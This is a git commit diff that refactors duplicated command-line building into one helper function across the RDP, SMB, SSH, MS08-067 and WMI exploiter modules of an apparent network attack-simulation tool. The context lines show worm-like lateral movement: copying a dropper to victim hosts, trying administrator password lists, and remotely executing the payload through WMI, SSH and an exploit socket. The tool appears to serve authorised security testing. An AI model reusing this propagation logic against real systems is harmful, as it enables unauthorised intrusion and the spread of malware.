merge duplicate code

This commit is contained in:
itsikkes 2016-07-26 18:52:58 +03:00
parent 63d8c4ed12
commit 76e3350fa3
6 changed files with 30 additions and 42 deletions

View File

@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from model.host import VictimHost
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from tools import build_monkey_commandline
__author__ = 'hoffer' __author__ = 'hoffer'
KEYS_INTERVAL = 0.1 KEYS_INTERVAL = 0.1
@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter):
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.") LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
return False return False
cmdline = " -p " + self._guid cmdline = build_monkey_commandline(host, depth-1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
if self._config.rdp_use_vbs_download: if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline} command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline}

View File

@ -6,6 +6,7 @@ from exploit import HostExploiter
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from network import SMBFinger
from tools import build_monkey_commandline
try: try:
from impacket import smb from impacket import smb
@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter):
else: else:
cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path} cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth-1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, )) rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))

View File

@ -1,6 +1,7 @@
import paramiko import paramiko
import monkeyfs import monkeyfs
import logging import logging
from tools import build_monkey_commandline
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
self._guid = __import__('config').GUID
self._update_timestamp = 0 self._update_timestamp = 0
def log_transfer(self, transferred, total): def log_transfer(self, transferred, total):
@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter):
try: try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth-1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
cmdline += "&" cmdline += "&"
ssh.exec_command(cmdline) ssh.exec_command(cmdline)

View File

@ -396,4 +396,22 @@ def get_target_monkey(host):
host.os.get('machine','').lower() == platform.machine().lower(): host.os.get('machine','').lower() == platform.machine().lower():
monkey_path = sys.executable monkey_path = sys.executable
return monkey_path return monkey_path
def build_monkey_commandline(target_host, depth):
from config import WormConfiguration, GUID
cmdline = ""
cmdline += " -p " + GUID
if target_host.default_tunnel:
cmdline += " -t " + target_host.default_tunnel
if target_host.default_server:
cmdline += " -s " + target_host.default_server
if depth < 0:
depth = 0
cmdline += " -d %d" % depth
return cmdline

View File

@ -17,6 +17,7 @@ from . import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp from network.tools import check_port_tcp
from network import SMBFinger from network import SMBFinger
from tools import build_monkey_commandline
try: try:
from impacket import smb from impacket import smb
@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
self._config.ms08_067_remote_user_pass, self._config.ms08_067_remote_user_pass,
src_path, src_path,
self._config.dropper_target_path) self._config.dropper_target_path)
if not remote_full_path: if not remote_full_path:
# try other passwords for administrator # try other passwords for administrator
for password in self._config.psexec_passwords: for password in self._config.psexec_passwords:
@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter):
else: else:
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth - 1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
try: try:
sock.send("start %s\r\n" % (cmdline, )) sock.send("start %s\r\n" % (cmdline, ))

View File

@ -2,6 +2,7 @@ import socket
import ntpath import ntpath
import logging import logging
import traceback import traceback
from tools import build_monkey_commandline
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost from model.host import VictimHost
from exploit import HostExploiter from exploit import HostExploiter
@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter):
else: else:
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth - 1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
# execute the remote monkey # execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline, result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,